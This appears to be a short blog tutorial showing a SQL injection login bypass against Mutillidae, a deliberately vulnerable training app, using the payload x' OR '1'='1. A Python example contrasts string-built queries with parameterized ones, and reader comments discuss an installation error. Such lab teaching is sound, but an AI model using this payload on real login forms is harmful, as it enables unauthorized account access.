Posted by shinigami at 05:31
In this post, I will write about SQL Injection bypass on Mutillidae.
- Open http://localhost/mutillidae/?page=login.php
- Insert a single quote in the username and password fields
You can see that some errors appear.
From the error, we know that the SQL query is:
SELECT * FROM accounts WHERE username=''' AND password='''
To begin the attack, we need to modify this query. I will use this input for the username and password:
x' OR '1'='1
Now, enter the input above into the username and password fields.
- Wow, I'm logged in as admin
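
The bypass above, reproduced as an added example (not code from the original post or from Mutillidae): Python with an in-memory SQLite database stands in for the PHP/MySQL login, and the sample rows and function names are assumptions. It shows why the input matches every account, with admin first, and how a parameterized query treats the same input as plain data.

```python
import sqlite3

def make_db():
    # Constructed sample rows; table and column names follow the query in the error message.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE accounts (username TEXT, password TEXT)")
    db.executemany("INSERT INTO accounts VALUES (?, ?)",
                   [("admin", "adminpass"), ("alice", "alicepass")])
    return db

def login_concatenated(db, username, password):
    # Vulnerable pattern: the input becomes part of the SQL text itself.
    sql = ("SELECT * FROM accounts WHERE username='" + username +
           "' AND password='" + password + "'")
    rows = db.execute(sql).fetchall()
    # Assumption: the application treats the first returned row as the logged-in user.
    return sql, [r[0] for r in rows]

def login_parameterized(db, username, password):
    # Hardened pattern: placeholders keep the input as data, never as SQL syntax.
    rows = db.execute(
        "SELECT * FROM accounts WHERE username=? AND password=?",
        (username, password)).fetchall()
    return [r[0] for r in rows]

if __name__ == "__main__":
    db = make_db()
    payload = "x' OR '1'='1"
    sql, matched = login_concatenated(db, payload, payload)
    print(sql)
    print("concatenated :", matched)
    print("parameterized:", login_parameterized(db, payload, payload))
    print("valid login  :", login_parameterized(db, "alice", "alicepass"))
```

Because AND binds tighter than OR, the trailing `OR '1'='1'` makes the WHERE clause true for every row, so the first account in the table is the one that gets logged in.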
IN METASPLOITABLE... when I make the field void, or put a quote, I get the error that it is supposed to get, BUT I get other errors that are not documented from what I can see... can you help me? If you are still checking the post... I see the table with the errors and below I see this (no screencap)
WARNING: Cannot modify header information - headers already sent by (output started at /var/www/mutullidae/index.php on line 148
The above repeats for lines 254 255 256...
I checked the lines, they seem to be OK... let me know if you can help me please...
Make sure your installation is correct.
I tried downloading the latest Mutillidae version, 2.3.12, configured the database, and SQL Injection worked for me.
Hope this helps.